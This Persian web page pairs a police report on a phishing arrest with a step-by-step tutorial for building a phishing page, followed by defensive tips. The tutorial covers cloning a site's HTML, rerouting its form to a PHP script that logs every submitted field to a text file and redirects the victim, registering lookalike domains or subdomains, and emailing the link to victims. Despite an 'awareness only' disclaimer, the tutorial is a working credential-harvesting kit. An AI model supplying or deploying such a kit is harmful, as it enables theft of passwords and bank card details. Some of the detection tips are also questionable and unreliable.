برنامه ساخت درگاه پرداخت جعلی ترفند فیشینگ
برداشت غیرمجاز با ترفند فیشینگ فرمانده انتظامی شهرستان خدابنده با اشاره به کشف یک پرونده فیشینگ ، گفت: این متهم با تبلیغ کار در منزل در شبکههای اجتماعی، قربانیان را به درگاه جعلی بانکی هدایت کرده پس از اخذ اطلاعات بانکی، اقدام به برداشت از حساب بانکی آنها می کرد.
پایگاه اطلاع رسانی پلیس فتا: سرهنگ دوم محسنغنیمتی فرماندهی انتظامی شهرستان خدابنده از توابع استان زنجان در تشریح این خبرافزود: درپی وصول پروندهای با موضوع کلاهبرداری اینترنتی به پلیس فتا شهرستان خدابنده موضوع به صورت ویژه در دستور کار کارشناسان پلیس فتا قرار گرفت.
وی ادامه داد: در تحقیقات صورت گرفته مشخص شد شخص یا اشخاصی در شبکههای اجتماعی، با طراحی رباتهای جعلی با موضوع کار درمنزل و ترغیب افراد به استفاده از درآمد بالا با ایدههای نو، افراد را جهت پرداخت هزینه های مشاوره، به درگاه جعلی بانکی هدایت به طوری که قربانی با وارد کردن اطلاعات کارت بانکی با پیغام خطا مواجه شده و پس از گذشت چند روزمتوجه برداشتهایی از حساب بانکی شده است.
این مقام انتظامی گفت: با اقدامات فنی و شگردهای خاص پلیسی متهم به هویت معلوم در یکی از استان ها شناسایی و با اخذ نیابت قضائی دستگیر گردید.
سرهنگ غنیمتی با بیان اینکه متهم با شگردهای مختلف اقدام به پولشوئی درآمد های نامشروع حاصل از اعمال مجرمانه می کرد ، گفت: وی ابتدا منکر بزه انتسابی گردید ولی پس از مواجهه با مستندات و مدارک جمع آوری شده از سوی کارشناسان پرونده، به بزه ارتکابی و سرقت اطلاعات کارت بانکی (فیشینگ) و برداشت از حساب های بانکی قربانیان در کل کشور اعتراف کرد..
فرمانده انتظامی شهرستان خدابنده توصیه کرد: شهروندان برای پیشگیری از این نوع کلاهبرداری نسبت به فعال سازی رمز یکبار مصرف کارت بانکی و نحوه فعالسازی و استفاده ازآن و غیر فعال سازی رمز های دوم ایستا مربوط به کارت های بانکی، به بانکهای عامل مراجعه کرده و همچنین میتوانند با استفاده از افزونه ضد فیشینگ نسبت به بررسی سایتهای جعلی بانکی اقدام کنند.
کی از رایجترین روشهای سرقت اطلاعات به خصوص رمزعبور، حملات فیشینگ با ساخت صفحه جعلی است. خرابکاران در حملات فیشینگ صفحاتی همانند صفحه وبسایت هدف میسازند و کاربران را ترغیب به login کردن در حسابهایشان میکنند.
در این مطلب آموشی میخوانیم که چگونه میتوان صفحه فیشینگ یا جعلی ساخت و از چه راههایی میتوانیم از خودمان در برابر حملات فیشینگ محافظت کنیم.توجه داشته باشید این نوع از آموزشها در وبسایت کنشتک صرفا به منظور نشان دادن راه و روش و ابزارهایی است که برخی با سواستفاده از آنها، امنیت و حریم شخصی کاربران دیگر را تهدید میکنند. ما معتقدیم با بالا بردن آگاهی و دانش است که کاربران در صدد حفظ امنیت خود برمیآیند.
ساخت صفحه جعلی یا صفحه فیشینگ
برای جعل یک صفحه وبسایت کافی است :
وبسایت مورد نظر را در مرورگر باز کنید.
سپس از منوی مرورگر و یا کلیک راست روی آن صفحه، گزینه Save as را کلیک کنید.
مطمئن شوید که نوع فایل Html Only باشد. زیرا به فایلهای جاوا اسکریپت و غیره نیازی نداریم. تمام عکسها بصورت لینک از خود وبسایت اصلی خوانده میشوند. (این روش سادهترین راه است. در نظر داشته باشید که با این روش احتمال شناسایی وبسایت جعلی توسط مدیران وبسایت اصلی امکان پذیر است.)
بعد از ذخیره میتوانید فایل Html مورد نظر را روی مرورگر باز کنید. دقیقا همان صفحه را خواهید دید غیر از آنکه آدرس وبسایت از دستگاه شما است.
مطمئن شوید که نام فایل را به index تغییر داده باشید. به این ترتیب فایل شما index.html خواهد بود.
در ریشه یک فایل متنی (txt) اضافه کنید. این فایل برای ذخیره اطلاعات ارسال شده (نام کاربری، رمزعبور و غیره) توسط فرم ورود یا هر فرم دیگر است. مانند list.txt
در همان مسیر یک فایل جدید اضافه کنید. نوع این فایل php است.
این فایل php که همان فایل phishing است را به هر اسمی غیر از phish یا phishing ذخیره کنید. برای نمونه sample.php.
نوبت فایل index.html است. آن را در ویرایشگری مانند notepad++ باز کنید.
در کدهای این فایل تگ form را پیدا کنید. میتوانید به کمک دکمههای میانبر Ctrl + F ابزار جستجو را باز کنید و form را پیدا کنید.
در تگ form، پارامتر action را خواهید دید. Action میگوید که اطلاعات فرم به کدام صفحه ارسال شوند. تنها کاری که باید انجام دهید، جایگزین کردن مسیر داخل دابل کوتیشن Action با نام فایل php تان است. action=”sample.php”
داخل تگ فرم پارامتر method را پیدا کنید. Method می گوید که اطلاعات چگونه ارسال شوند. دو گزینه برای این پارامتر وجود دارند یکی POST و دیگری GET. در ارسال با POST اطلاعات فرم در بدنه HTTP Request فرستاده میشوند و امنیت این روش بالا است. اما در روش GET اطلاعات فرم در URL ارسال میشوند. مطمئن شوید که گزینه GET را برای پارامتر Method انتخاب کرده باشید.
فایل را ذخیره کنید.
در این مرحله نیاز به یک دامنه و یک هاست دارید.
بعد از خرید دامنه و هاست، dnsهای دامنه را به Name Server هاست تغییر دهید.
با استفاده از FTP، SFTP یا کنترل پنلهای موجود، فایلهایتان را روی هاستتان آپلود کنید.
<?php
Header("Location: http://www.spy24.info");
$handle = fopen("list.txt", "a");
foreach($_GET as $variable => $value) {
fwrite ($handle, $variable);
fwrite ($handle, $value);
fwrite ($handle, "\r\n");
}
fwrite ($handle, "\r\n");
fclose($handle);
exit;
?>
کافی است نام دامنه ثبت شده شما نزدیک به دامنه وبسایت هدف باشد یا از سرویسهای کوتاه کننده لینک استفاده کنید. همچنین میتوانید در دامنه خودتان یک Sub Damian به نام دامنه وبسایت هدف بسازید تا صفحه جعلی شما در آن آدرس باز شود. برای مثال وبسایت هدف http://www.examlpe.com است و دامنه ثبت شما sample.com میباشد. میتوانید یکSub Damian با نام ex بسازید و مسیر فایلهای آپلود شده را به آن متصل کنید. در اینصورت صفحه جعلی شما در آدرس ex.sample.com نمایش داده میشود.
تمام شد. تنها کاری که باید انجام دهید ارسال لینک صفحه جعلی به ایمیل کاربران دیگر و درخواست از آنها برای ورد به حساب کاربریشان است. اگر کاربری اطلاعات خود را از طریق صفحه فیشینگ شما ارسال کند، آن اطلاعات در فایل list.txt ذخیره میشوند.
چگونه از حملات فیشینگ در امان بمانیم؟
هرگز تکرار میکنیم هرگز به ایمیلهایی که از شما به ترفندهای مختلف درخواست میکنند وارد حسابهایتان شوید توجه نکنید.
هنگامی که میخواهید وارد حسابهایتان شوید به آدرس صفحه دقت کنید تا به اشتباه گرفتار صفحه جعلی نشوید.
اگر به اشتباه اطلاعات خود را در صفحه جعلی وارد کرده اید به سرعت وارد حسابتان شوید و رمزعبور را تغییر دهید. اگر رمزعبور شما تغییر پیدا کرده است آن را ریکاوری کنید. اگر این مورد هم بی نتیجه ماند، سریعا با پشتیبانی آن سرویس تماس بگیرید و موضوع را توضیح دهید.
ایمیلهای فیشینگی که برایتان ارسال میشوند ممکن است دقیقا به فرمت ایمیل سرویس مورد نظر باشد. اگر لازم است وارد حسابتان شوید به جای کلیک بر روی لینکهای ایمیل، مستقیم وارد حسابتان شوید.
حتما گزینه احراز هویت دو عامله حسابهای آنلاینتان را فعال کنید.
حالا شما میدانید در پشت پرده حملات فیشینگ چه میگذرد و آنها چگونه اطلاعات کاربران را به سرقت میبرند. از دانش و آگاهیتان برای بالا بردن امنیت خود و اطرافیان استفاده کنید.
چگونه درگاههای جعلی پرداخت را بشناسیم؟
بیشترین کلاهبرداریهای اینترنتی هنگام خرید اینترنتی اتفاق میافتد. یکی از مهمترین راههای جلوگیری از سرقتهای اینترنتی شناختن درگاههای اینترنتی جعلی است. کافیست شما یک بار اطلاعات خود را وارد یک صفحه جعلی کنید تا زمانی که رمز اینترنتی خود را عوض کنید فرصت کلاهبرداری از شما وجود دارد. راههای تشخیص صفحههای جعلی درگاههای اینترنتی را در ادامه بخوانید.
- یکی از راههای شناسایی این صفحات آدرس URL سایت است که باید دقت شود همان آدرس اصلی درگاه اینترنتی باشد و حرفی کم یا اضافه نداشته باشد.
- آدرس سایتها و درگاههای اصلی با آدرس اینترنتی https آغاز میشوند و در صورتی که درگاهی فاقد "S" باشد نباید به آن اعتماد کرد.
- از راههای تشخیص صفحات جعلی، تازه کردن (رفرش شدن) صفحه است و در صورتی که شمارهها در صفحه کلید مجازی تغییر نکرد، آن صفحه جعلی است.
- روش دیگر نیز این است که یک بار اطلاعات کارت بانکی خود را عمداً اشتباه وارد کنید، اگر پیغام خطا داد، یعنی درگاه جعلی نیست، اما اگر پیغام عملیات موفقیت آمیز است را مشاهده کردید، بدانید که با یک درگاه جعلی مواجه هستید.
اطلاعات همه ما کاربران تلگرام هک شد!!!
30 برنامه برتر هک وای فای برای اندروید در سال ۲۰۲۳
شاهکارهای ادبیات فارسی که هر ایرانی باید بخواند